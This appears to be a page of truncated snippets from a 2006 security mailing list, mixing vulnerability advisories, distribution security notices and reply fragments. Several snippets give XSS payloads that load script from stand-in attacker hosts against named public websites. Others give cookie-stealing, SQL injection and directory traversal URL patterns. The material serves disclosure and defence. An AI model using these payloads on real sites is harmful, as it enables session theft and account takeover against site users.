-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -
Advisory id: FSA:013
Author:Federico Fazzi
Date: 12/06/2006, 9:31
Sinthesis: DCP-Portal 6.1.x, Remote command execution
Type: high
Product: http://www.dcp-portal.org/
Patch: u
-
Advisory id: FSA:012
Author:Federico Fazzi
Date: 11/06/2006, 22:30
Sinthesis: Content-Builder (CMS) 0.7.5, Remote command execution
Type: high
Product: http://www.content-builder.de/
Patch: unavailable
--
Emllabs.com
Effected files:
articles.php
search input box.
The search input box doesnt properally filter user input. for PoC try putting
in: [SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
XSS Vulnerability:
http://previous.emllabs.com/articles.php?navCur=[SCRIPT%20SRC=http://evils
Hello,
This is for you...
Thanks for reading...
*
* No cON Name 2006 Congress === Call For Papers *
*
<> http://www.noconname.org/congreso2006.php<>
<> September: 28th, 29th and 30th.
-
Advisory id: FSA:014
Author:Federico Fazzi
Date: 12/06/2006, 10:25
Sinthesis: phpCMS 1.2.1pl2, Remote command execution
Type: high
Product: http://www.phpcms.de/
Patch: unavailable
---
Internet Explorer Crash [Proof of concept]
based on MarjinZ & Mr.Niega discovered
Affected Software: Internet explorer
Severity: Unknown
Impact: Crash
E-Mail: [EMAIL PROTECTED]
IE ver. 6.0.2900.2180.xpsp_sp2_rtm.040803-2158 not affected
- Original Message -
From: <[EMAIL PROTECTED]>
To:
Sent: Thursday, June 08, 2006 11:00 PM
Subject: Internet Explorer vulnerbility
/*
*
* Internet Explorer Crash [Proof of concept]
* Bug discovered by MarjinZ & Mr.Niega
* ht
*//Product :Invision Power Board
*//Version :2.1.6 and prior versions must be affected.
*//XSS=
http://localhost/forum/admin.php?phpinfo=alert()
*//You can steal only admins cookie.
*//www.spymastersnake.org
*//[EMAIL PROTECTED]
From the article:
"Access to the at command varies, on some installations of Windows,
even the Guest account can access it, on others it's limited to
Administrator accounts."
But it's limited to members of the Administrators group by default.
Anyone who is an administrator can make their system
I got > 88% if i use your PoC.
But if i press the close-button of this tab, the 'DoS'
stop to work. ;)
Opera 8.52
OS: NetBSD-current
Yourfacesucks.com
Homepage:
http://www.yourfacesucks.com
Effected files:
music/video input boxes in editing profile
subject box of sending a PM
thread.php
---
XSS Vuln with cookie disclosure in profile input boxes:
No filter evasion needed here. Fo
I agree on your point that the technology requires PROPER design.
Vendors who miss the basics should lose their right to play the game.
On 6/9/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:
On Fri, 9 Jun 2006, E Mintz wrote:
> How about some real-world, application specific exploits?
There's
[EMAIL PROTECTED]:
/*
*
* Internet Explorer Crash [Proof of concept]
* Bug discovered by MarjinZ & Mr.Niega
* http://www.swerat.com/
*
* Affected Software: Internet explorer
* Severity: Unknown
* Impact: Crash
* Solution Status: Unpatched
*
* E-Mail: [EMAIL PROTECTED] & [EMAIL PROTECTED]
* __
Symantec Remote Management Stack Buffer Overflow
Release Date:
June 12, 2006
Date Reported:
May 24, 2006
Severity:
High (Remote Code Execution)
Systems Affected:
Symantec AntiVirus 10.0.x for Windows (all versions)
Symantec AntiVirus 10.1.x for Windows (all versions)
Symantec Client Security 3.
Meefo.com
Homepage:
http://meefo.com
Effected files:
reading profiles
index.php
input boxes onprofiles
sending private msgs
--
Reading aprofile and with cookie include PoC:
Since data isn't properlly filtered (backslashes are added to ' and "), a user
can
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
# Milli-Harekat Advisory ( www.milli-harekat.org )
# PHORUM <= 5.1.13 - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : PHORUM 5.1.13
# Credits : ERNE
# Thanks : Dj_Remix,The_Bekir,Liz0zim,Eskobar,SpC-x,3n7r1k4 and ALL MHG USERS
# Vulnerable :
http://www
Vampirefreaks.com
Homepage:
http://www.vampirefreaks.com
Effected files:
input boxes of editing your profile
posting a journal entry.
Commenting
XSS Vulnerability:
Data isn't properly filtered when editing your profile. One way to bypass the
filter is to escape quotes and useclosing b
At least in terms of Cisco, you are confusing SSL VPN and Web VPN. They are
not interoperable and offer different levels of security.
IE7 Beta 2 build [7.0.5346.5] parses without crashing.
Greg Merideth
Forward Technology, LLC.
CTO & Other Wild Stuff
[EMAIL PROTECTED]
PGP Fingerprint
18C3CE191171736225D62C3829F7B18A00F2AC0C
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Thursday, June 08, 20
Very good information, we use F5 firepass products and I could see the same
issue inherinet in your statements. The benefits to the business, from a cost
perspective, are many, no need for tokens unless you are doing 2-factor auth,
which I encourage as it will check your personal PIN against you
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:099
http://www.mandriva.com/security/
___
rPath Security Advisory: 2006-0100-1
Published: 2006-06-12
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
User Non-deterministic Weakness
Updated Versions:
freetype=/[EMAIL PROTECTED]:devel//1/2.1.10-2.2-1
References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?n
Virtualtourist.com
Homepage:
http://www.virtualtourist.com
Effected files:
Input boxes of your profile
search destination input box
---
XSS vulnerability with cookie disclosure:
Under the section of "Tell others a little about yourse
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
[EMAIL PROTECTED],
require "config.inc"; contains 'private' =>
'/www/mrpenguin.org/devel/private',
So this shouldn't be vulnerable. Missing something?
/str0ke
On 11 Jun 2006 20:47:48 -, [EMAIL PROTECTED]
<[EMAIL PROTECTED]> wrote:
igloo DoubleSpeak v 0.1 Multiple remote file inclusion
Onlinenode.com
Homepage:
http://www.onlinenode.com
Effected files:
node_category.php
node_article.php
webpage.php
guestbook.php
journal.php
pictures.php
chatroom.php
---
XSS Vuln via node_category.php:
One way to archive this is to use black tags with an op
Stargazer.org
Homepage:
http://www.stargazer.org
Effected files:
login box
registration boxes
creating a survey
---
Login box & registration XSS Vuln:
for proof of concept just try adding:
'';!--"=&{()}http://youfucktard.com/xss.js>'';!--"=&{()
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= Advisory: Windows XP Task Scheduler Local Privilege Escalation
=
= Author: Daniel Hückmann (zipk0der) [EMAIL PROTECTED]
=
= Released at: http://www.pandora-security.com
=
=-=-
// ThWboard 3.0 <= SQL Injection //
-
[~] Advisory by: SR-Crew
[-] Exploit: http://www.example.com/showtopic.php?threadid=1&pagenum=[SQL]
[-] Googledork: -
[+] Greetz to: BlueGeek.de
[+] Visit: www.SR-Crew.de.tt
Cescripts.com Scripts
Below are scripts I tested from the site cescripts.com. This site seels to be
selling canned scripts, full of errors. Anyways, take a look:
Car Classifieds
Homepage:
http://www.cescripts.com/
effected files:
index.php
XSS Vulnerabilities PoC:
Viewing a car:
htt
Wireclub.com
Homepage:
http://www.wireclub.com
Effected files:
input boxes of editing a profile
XSS Vuln with no filter evasion at all:
We notice that when trying to put a url in the Open line about yourself input
box, we get the msg "no urls allowed" as well as "the field cannot cont
Nowtalking.com
Homepage:
http://www.nowtalking.com
Effected files:
input boxes of logging in and searching
friends-new.asp
gallery.asp
friends.asp
gb.asp
JET DB error due to injection:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'UserNam
this is ok:
-
Advisory id: FSA:011
Author:Federico Fazzi
Date: 11/06/2006, 22:30
Sinthesis: AWF CMS 1.11, Remote command execution
Type: high
Product: http://www.awf-cms.org/
Patch: unavailable
---
# Foing (manage_songs.php) Remote File Inclusion[phpBB]
#
# Contact : email: [EMAIL PROTECTED] & msn: [EMAIL PROTECTED]
# Risk : High
# Class : Remote
# Script : Foing
# Version : 0.7.0 e previous
-
Vulnerable code :
i
Opengaia.com
Homepage:
http://www.opengaia.com
Effected files:
my_page.php
module.php
editing your profile
the search input box
adding a diary/blog
Just like in onlinenode.com's vulnerabilities, it seems this site filters data
just about the same.
[ORIGINAL ADVISORY:]
http://myimei.com/security/2006-06-11/copperminephotogallery148-addhit-function-sqlinjection-attack.html
HTTP://KAPDA.IR
-Summary-
Software: CPG Coppermine Photo Gallery
Softwares Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.8.stable
Class: Remote
S
PaintedOver.com, Inc. 2004-2006
Hosted images © their respective owners /show.php Xss Vulnerabilities
Software: PaintedOver.com, Inc. 2004-2006
Hosted images © their respective owners
Version: All
Type: Cross site scripting
Date: 11\06\2006 17:00
Credit: redLine
Example:
http://
Wanderlist.com
Homepage:
http://www.wanderlist.com
search.cgi
Search box input
adding a item to a list
Search.cgi XSS vuln with sessions disclosure:
By putting a few ending opening tags with quotes beforeand after,we are able
create a XSS example:
">">">'http://youfucktard.com/xss.js
Myscrapbook
Homepage:
http://www.pixytrix.com/myscrapbook/
Effected files:
singlepage.php
---
Full path error with viewing most files in the txt-db-api dir:
Warning: main(API_HOME_DIRutil.php): failed to open stream: No such file or
directory in /
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[tempnam() Bypass unique file name PHP 5.1.4]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 22.5.2006
- -Public: 11.6.2006
from SECURITYREASON.COM
CVE-2006-2660
- --- 0.Description ---
PHP is an HTML-embedded scripting languag
Cross Site Scripting
http://[...]/read.php?msg_result=[XSS]
http://[...]/read.php?rep_titre=";>[XSS]
Cookies: CSForum_nom=">[XSS]; CSForum_mail=">[XSS]; CSForum_url=">[XSS]
SQL Injection
*
http://[...]/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT]
http://[..
RCblog 1.03
website : www.fluffington.com
discovered by : Hessam-x
www.Hessamx.net
--[ Directory Traversal]
script : "index.php"
/rcblog/index.php?post=../a_file%00
WinSCP - URI Handler Command Switch Parsing
About winscp :
WinSCP is an open source freeware SFTP client for Windows using SSH.
Legacy SCP protocol is also supported. Its main function is safe copying
of files between a local and a remote computer.
Versions affected :
It was tested on WinSCP 3.
Multiple XSS Vulnerabilities exist in vbulletin.com's website that allow the
attacker to gain sensitive credentials for authentication himself as a user on
the forum and site.
The first problem lies in the the site's Sales Form for opening an issue
ticket. Proper sanitation of variables passe
XSS vulnerability fixed in version 0.50.
Please download the latest version at http://ifoto.ireans.com
Thank you.
...
Aizu
Hotbot.com - XSS vulnerability
--
Type: Cross site scripting
Date: June, 10th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
http://www.m
Lycos.com - XSS vulnerability
--
Type: Cross site scripting
Date: June, 10th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
http://www.ma
==
Secunia Research 12/06/2006
- MyBB "domecode()" PHP Code Execution Vulnerability -
==
Table of Contents
Affected Software.
5 Star Review Script
Homepage:
http://www.review-script.com/
Effected files:
index2.php
report.php
search box
editing your profile
posting a review.
--
index2.php XSS Vuln with cookie disclosure:
By ending quotes and using a few closing and opening tag
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
Diaryland.com
Homepage:
http://www.diaryland.com
Effected files:
input boxes on creating diary entries.
posting comments in diary entries
XSS Vuln PoC:
With no filter evasion at all, we simply put as our entry:
[SCRIPT SRC=http://youfucktard.com/xss.js][/SCRIPT]
Screenshots:
http://
Mydeardiary.com
Homepage:
http://www.mydeardiary.com
Effected files:
search input boxes
Adding new diary entries
--
We create our XSS example by ending quotes with tags before and after:
">">">'>http://youfucktard.com/xss.js><"<"<"<"<"
Screensho
igloo DoubleSpeak v 0.1 Multiple remote file inclusion
-
Aria-security.com advisory
Bug Discovered by [EMAIL PROTECTED] (amin emami)
Original Advisory:http://www.aria-security.net/advisory/igloo/doublespeak.txt
email:[EMAIL PROTECTED]
Date:1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
57 matches
Mail list logo
